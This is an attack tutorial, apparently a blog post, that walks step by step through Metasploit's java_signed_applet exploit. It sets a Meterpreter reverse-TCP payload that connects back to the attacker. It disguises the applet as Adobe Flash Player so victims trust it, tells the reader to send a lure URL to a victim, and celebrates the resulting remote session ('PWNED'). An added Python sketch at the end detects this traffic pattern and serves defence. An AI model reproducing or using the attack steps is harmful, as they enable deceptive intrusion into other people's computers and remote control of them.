Java_signed_applet
Requirements:
1. Metasploit Framework
2. Operating system (I recommend Linux or BackTrack 5)
Step by Step:
1. Open msfconsole and find the java_signed_applet exploit with the command search java_signed_applet. If you can't find it, update your Metasploit Framework to a newer version with the msfupdate command.
use exploit/multi/browser/java_signed_applet ---> load the java_signed_applet exploit
set payload windows/meterpreter/reverse_tcp ---> set the reverse_tcp meterpreter to connect back
2. Next, we need to set the options the attack requires. The settings below are my configuration; to view all available options, type show options.
set appletname Adobe_Inc ---> the name of our Java applet as shown to the victim, chosen so that the victim is not suspicious of the link you give
set certcn Adobe Flash Player ---> On older versions the dialog will display the value of CERTCN in the "Publisher" line. Newer JVMs display "UNKNOWN" when the signature is not trusted (i.e., it's not signed by a trusted CA).
set srvhost 192.168.8.92 ---> the host that serves the exploit
set srvport 80 ---> I chose 80 because it works well for social engineering, especially social engineering via a website
set uripath videoplaylist ---> the URL to send to the victim (http://192.168.8.92/videoplaylist)
set lhost 192.168.8.92 ---> the connect-back address used when the attack succeeds
set lport 443 ---> port used to connect back to our machine
3. When everything has been set up correctly, run the exploit command.
This is the URL you should give to your victim: http://192.168.8.92/videoplaylist.
4. When the victim opens that link in their browser, a dialog box immediately appears warning that the digital signature cannot be verified.
5. After the victim opens the malicious URL and clicks RUN,
6. Press CTRL + C to stop the process or you can directly run sessions -l to view the active sessions.
7. Yes, we have 1 active session in our list. To interact with that session, simply run sessions -i 1, where 1 is the ID of the session.
PWNED! We're already inside the victim's computer.
Enjoy ;)
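Seen from the defender's side, the steps above leave a correlatable trace: the Java plug-in (User-Agent containing "Java/") fetches content from a bare IP address, and shortly afterwards the same client opens a plain TCP connection, not TLS, back to that IP (port 443 in this walkthrough). The following detection sketch is an added example, not part of the original post; the log layout, the 5-minute window and the sample events are constructed assumptions.

```python
import ipaddress
from datetime import datetime, timedelta

# Constructed sample events (not from the original post). Assumed layout:
# time|client|kind|dest host|dest port|detail (User-Agent for http, "tls"/"raw" for flow)
SAMPLE = """\
2024-01-10T09:00:01|10.0.0.21|http|192.168.8.92|80|Mozilla/5.0 (Windows NT 6.1) Firefox/10.0
2024-01-10T09:00:03|10.0.0.21|http|192.168.8.92|80|Mozilla/4.0 (Windows 7 6.1) Java/1.6.0_26
2024-01-10T09:00:09|10.0.0.21|flow|192.168.8.92|443|raw
2024-01-10T09:05:00|10.0.0.34|http|updates.example.com|80|Mozilla/4.0 (Windows 7 6.1) Java/1.6.0_26
2024-01-10T09:05:02|10.0.0.34|flow|203.0.113.7|443|tls
"""

WINDOW = timedelta(minutes=5)  # assumed correlation window

def is_ip_literal(host):
    """True when the HTTP host is a raw IP address rather than a DNS name."""
    try:
        ipaddress.ip_address(host)
        return True
    except ValueError:
        return False

def parse(text):
    for line in text.splitlines():
        ts, client, kind, host, port, detail = line.split("|", 5)
        yield datetime.fromisoformat(ts), client, kind, host, int(port), detail

def find_applet_callbacks(text):
    """Return (client, server, port) where a Java plug-in fetch from a bare IP
    is followed within WINDOW by a non-TLS connection to the same IP.
    Events are assumed to be in time order."""
    fetches = {}  # (client, server) -> time of the most recent Java plug-in fetch
    alerts = []
    for ts, client, kind, host, port, detail in parse(text):
        if kind == "http" and "Java/" in detail and is_ip_literal(host):
            fetches[(client, host)] = ts
        elif kind == "flow" and detail != "tls":
            seen = fetches.get((client, host))
            if seen is not None and ts - seen <= WINDOW:
                alerts.append((client, host, port))
    return alerts

if __name__ == "__main__":
    for client, server, port in find_applet_callbacks(SAMPLE):
        print(f"ALERT {client}: Java fetch from {server}, then raw TCP to {server}:{port}")
```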